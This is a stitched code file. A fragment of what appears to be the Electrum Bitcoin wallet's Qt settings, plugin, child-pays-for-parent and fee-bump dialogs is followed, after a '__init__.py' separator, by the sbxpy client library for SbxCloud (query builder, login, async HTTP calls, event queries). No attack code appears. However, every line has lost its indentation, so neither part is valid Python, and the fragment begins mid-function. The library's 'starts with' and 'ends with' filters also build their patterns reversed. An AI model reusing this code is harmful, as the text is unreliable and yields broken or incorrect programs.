use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possiblity, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['BTC', 'mBTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1BTC=1000mBTC.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BTC':
self.decimal_point = 8
elif unit_result == 'mBTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
try:
if not self.wallet.add_transaction(tx.txid(), tx):
self.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
self.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
self.show_message(_("Transaction saved successfully"))
return True
|
__init__.py
|
from sbxpy.QueryBuilder import QueryBuilder as Qb
import aiohttp
import asyncio
import copy
import math
from threading import Thread
'''
:mod:`sbxpy` -- Main Library
===================================
.. module:: sbxpy
:platform: Unix, Windows
:synopsis: This is the module that use QueryBuilder to create all request used to communicate with SbxCloud
.. moduleauthor:: Luis Guzman <lgguzman890414@gmail.com>
'''
class Find:
def __init__(self, model, sbx_core):
self.query = Qb().set_domain(sbx_core.environment['domain']).set_model(model)
self.lastANDOR = None
self.sbx_core = sbx_core
self.url = self.sbx_core.urls['find']
def compile(self):
return self.query.compile()
def new_group_with_and(self):
self.query.new_group('AND')
self.lastANDOR = None
return self
def new_group_with_or(self):
self.query.new_group('OR')
self.lastANDOR = None
return self
def and_where_is_equal(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '=', value)
return self
def and_where_is_not_null(self, field):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'IS NOT', None)
return self
def and_where_is_null(self, field):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'IS', None)
return self
def and_where_greater_than(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '>', value)
return self
def and_where_less_than(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '<', value)
return self
def and_where_greater_or_equal_than(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '>=', value)
return self
def and_where_less_or_equal_than(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '<=', value)
return self
def and_where_is_not_equal(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '!=', value)
return self
def and_where_starts_with(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'LIKE', '%' + value)
return self
def and_where_ends_with(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'LIKE', value + '%')
return self
def and_where_contains(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'LIKE', '%' + value + '%')
return self
def and_where_in(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'IN', value)
return self
def and_where_not_in(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'NOT IN', value)
return self
def or_where_is_equal(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '=', value)
return self
def or_where_is_not_null(self, field):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'IS NOT', None)
return self
def or_where_is_null(self, field):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'IS', None)
return self
def or_where_greater_than(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '>', value)
return self
def or_where_less_than(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '<', value)
return self
def or_where_greater_or_equal_than(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '>=', value)
return self
def or_where_less_or_equal_than(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '<=', value)
return self
def or_where_is_not_equal(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '!=', value)
return self
def or_where_starts_with(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'LIKE', '%' + value)
return self
def or_where_ends_with(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'LIKE', value + '%')
return self
def or_where_contains(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'LIKE', '%' + value + '%')
return self
def or_where_in(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'IN', value)
return self
def or_where_not_in(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'NOT IN', value)
return self
def or_where_reference_join_between(self, field, reference_field):
return ReferenceJoin(self, field, reference_field, 'OR')
def and_where_reference_join_between(self, field, reference_field):
return ReferenceJoin(self, field, reference_field, 'AND')
def where_with_keys(self, keys):
self.query.where_with_keys(keys)
return self
def order_by(self, field, asc):
self.query.order_by(field, asc)
return self
def fetch_models(self, array):
self.query.fetch_models(array)
return self
def reverse_fetch(self, array):
self.query.reverse_fetch(array)
return self
def set_page(self, page):
self.query.set_page(page)
return self
def set_page_size(self, size):
self.query.set_page_size(size)
return self
async def __then(self, query_compiled):
async with aiohttp.ClientSession() as session:
async with session.post(
self.sbx_core.p(self.url), json=query_compiled,
headers=self.sbx_core.get_headers_json()) as resp:
print("sent")
r = await resp.json()
print("response")
return r
def set_url(self, is_find):
self.url = self.sbx_core.urls['find'] if is_find else self.sbx_core.urls['delete']
async def find(self):
self.set_url(True)
return await self.__then(self.query.compile())
def find_callback(self, callback):
self.sbx_core.make_callback(self.find(), callback)
async def find_all_query(self, page_size=1000, max_in_parallel=2):
self.set_page_size(page_size)
self.set_url(True)
queries = []
query_compiled = self.query.compile()
data = await self.__then(query_compiled)
total_pages = data['total_pages']
for i in range(total_pages+1):
query_aux = copy.deepcopy(query_compiled)
query_aux['page'] = (i + 1)
queries.append(self.__then(query_aux))
futures = self.__chunk_it(queries, min(max_in_parallel, len(queries)))
results = await asyncio.gather(*[futures[i] for i in range(len(futures))])
data = []
for i in range(len(results)):
for j in range(len(results[i])):
data.extend(results[i][j])
return data
def find_all_callback(self, callback):
self.sbx_core.make_callback(self.find_all_query(), callback)
def __chunk_it(self, seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(asyncio.gather(*seq[int(last):int(last + avg)]))
last += avg
return out
class ReferenceJoin:
def __init__(self, find, field, reference_field, types):
self.find = find
self.field = field
self.reference_field = reference_field
if types == 'AND':
self.find.and_where_in(self.field, '@reference_join@')
else:
self.find.or_where_in(self.field, '@reference_join@')
def in_model(self, reference_model):
return FilterJoin(self.find, self.field, self.reference_field, reference_model)
class FilterJoin:
def __init__(self, find, field, reference_field, reference_model):
self.find = find
self.field = field
self.reference_field = reference_field
self.reference_model = reference_model
def filter_where_is_equal(self, value):
self.find.query.setReferenceJoin('=', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_is_not_null(self, value):
self.find.query.setReferenceJoin('IS NOT', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_is_null(self, value):
self.find.query.setReferenceJoin('IS', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_greater_than(self, value):
self.find.query.setReferenceJoin('>', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_less_than(self, value):
self.find.query.setReferenceJoin('<', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_greater_or_equal_than(self, value):
self.find.query.setReferenceJoin('>=', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_less_or_equal_than(self, value):
self.find.query.setReferenceJoin('<=', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_is_not_equal(self, value):
self.find.query.setReferenceJoin('!=', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_like(self, value):
self.find.query.setReferenceJoin('LIKE', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_in(self, value):
self.find.query.setReferenceJoin('IN', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_not_in(self, value):
self.find.query.setReferenceJoin('NOT IN', self.field, self.reference_field, self.reference_model, value)
return self.find
class SbxCore:
'''
This is the core of the communication with SbxCloud.
The concurrent task operates with asyncio
The request operates with aiohttp
'''
environment = {}
headers = {}
urls = {
'update_password': '/user/v1/password',
'login': '/user/v1/login',
'register': '/user/v1/register',
'validate': '/user/v1/validate',
'row': '/data/v1/row',
'find': '/data/v1/row/find',
'update': '/data/v1/row/update',
'delete': '/data/v1/row/',
'downloadFile': '/content/v1/download',
'uploadFile': '/content/v1/upload',
'addFolder': '/content/v1/folder',
'folderList': '/content/v1/folder',
'send_mail': '/email/v1/send',
'payment_customer': '/payment/v1/customer',
'payment_card': '/payment/v1/card',
'payment_token': '/payment/v1/token',
'password': '/user/v1/password/request',
'cloudscript_run': '/cloudscript/v1/run',
'domain': '/data/v1/row/model/list'
}
def __init__(self, manage_loop=False):
'''
Create a instance of SbxCore.
:param manage_loop: if the event loop is manage by the library
'''
self.loop = None
self.t = None
if manage_loop:
def start_loop():
print('loop started')
self.loop.run_forever()
self.loop = asyncio.new_event_loop()
self.t = Thread(target=start_loop)
self.t.start()
def get_headers_json(self):
self.headers['Content-Type'] = 'application/json'
return self.headers
def p(self, path):
return self.environment['base_url'] + path
def initialize(self, domain, app_key, base_url):
self.environment['domain'] = domain
self.environment['base_url'] = base_url
self.environment['app_key'] = app_key
self.headers['App-Key'] = app_key
return self
def with_model(self, model):
return Find(model, self)
def query_builder_to_insert(self, data, let_null):
query = Qb().set_domain(self.environment['domain'])
if isinstance(data, list):
for item in data:
query.add_object(self.validate_data(item, let_null))
else:
query.add_object(self.validate_data(data, let_null))
return query
def is_update(self, data):
sw = False
if isinstance(data, list):
for item in data:
if "_KEY" in item:
sw = True
else:
if "_KEY" in data:
sw = True
return sw
def validate_data(self, data, let_null):
listkeys = [key for key in data if let_null or data[key] is not None]
temp = {}
for key in listkeys:
if data[key] is not None and isinstance(data[key], dict) and '_KEY' in data[key]:
data[key] = data[key]['_KEY']
temp[key] = data[key]
return temp
'''
======================================
Async Functions
======================================
'''
async def login(self, login, password, domain):
async with aiohttp.ClientSession() as session:
params = {'login': login, 'password': password, 'domain': domain}
async with session.get(self.p(self.urls['login']), params=params, headers=self.get_headers_json()) as resp:
data = await resp.json()
if data['success']:
self.headers['Authorization'] = 'Bearer ' + data['token']
return data
async def list_domain(self):
async with aiohttp.ClientSession() as session:
params = {'domain': self.environment['domain']}
async with session.get(self.p(self.urls['domain']), params=params, headers=self.get_headers_json()) as resp:
return await resp.json()
async def run(self, key, params):
async with aiohttp.ClientSession() as session:
params = {'key': key, 'params': params}
async with session.post(self.p(self.urls['cloudscript_run']), json=params,
headers=self.get_headers_json()) as resp:
return await resp.json()
async def upsert(self, model, data, let_null=False):
query = self.query_builder_to_insert(data, let_null).set_model(model).compile()
return await self.__then(query, self.is_update(data))
async def __then(self, query_compiled, update):
async with aiohttp.ClientSession() as session:
async with session.post(
self.p(self.urls['row'] if not update else self.urls['update']), json=query_compiled,
headers=self.get_headers_json()) as resp:
return await resp.json()
'''
======================================
Callback Functions
======================================
'''
def loginCallback(self, login, password, domain, call):
self.make_callback(self.login(login, password, domain), call)
def upsertCallback(self, model, data, call, let_null=False):
self.make_callback(self.upsert(model, data, let_null), call)
def make_callback(self, coroutine, call):
try:
if self.loop is None:
raise Exception('SbxCore must initialize with manage_loop True')
else:
# future = asyncio.ensure_future(
# coroutine, loop=self.loop)
def callback(fut):
call(None, fut.result())
# future.add_done_callback(callback)
future = asyncio.run_coroutine_threadsafe(coroutine, loop=self.loop)
future.add_done_callback(callback)
except Exception as inst:
call(inst, None)
def close_connection(self):
if self.loop is not None:
if self.loop.is_running():
asyncio.gather(*asyncio.all_tasks()).cancel()
self.loop.stop()
class EventQuery:
def __init__(self, event, sbx_event):
self.sbx_event = sbx_event
self.url = self.sbx_event.urls['list'] + "/" + sbx_event.environment['domain'] + "/" + event
async def then(self, params):
async with aiohttp.ClientSession() as session:
async with session.get(
self.sbx_event.p(self.url), params=params,
headers=self.sbx_event.get_headers_json()) as resp:
return await resp.json()
class SbxEvent:
'''
This is the core of the communication with SbxEvent.
The concurrent task operates with asyncio
The request operates with aiohttp
curl --request GET \
--url 'https://sbx-svc-event-test.nubesocobox.com/api/event/129/ibf_delete_box?fromDate=2021-02-28T18%3A30%3A00.000Z&toDate=2021-04-23T14%3A12%3A04.990Z' \
--header 'accept-encoding: gzip, deflate, br' \
--header 'sbx-secret: '
'''
environment = {}
headers = {}
urls = {
'list': '/api/event'
}
def __init__(self, manage_loop=False):
'''
Create a instance of SbxCore.
:param manage_loop: if the event loop is manage by the library
'''
self.loop = None
self.t = None
if manage_loop:
def start_loop():
print('loop started')
self.loop.run_forever()
self.loop = asyncio.new_event_loop()
self.t = Thread(target=start_loop)
self.t.start()
def get_headers_json(self):
self.headers['Content-Type'] = 'application/json'
self.headers['accept-encoding'] = 'gzip, deflate, br'
return self.headers
def p(self, path):
return self.environment['base_url'] + path
def initialize(self, domain, app_key, base_url):
self.environment['domain'] = domain
self.environment['base_url'] = base_url
self.environment['sbx-secret'] = app_key
self.headers['sbx-secret'] = app_key
return self
def with_event(self, event):
return EventQuery(event, self)
class WorkflowQuery:
def __init__(self, sbx_workflow):
self.sbx_workflow = sbx_workflow
self.url = self.sbx_workflow.urls['api'] + self.sbx_workflow.environment['domain'] + self.sbx_workflow.urls['list_process_execution']
def __chunk_it(self, seq, num):
avg = len(seq) / float(num)
out = []
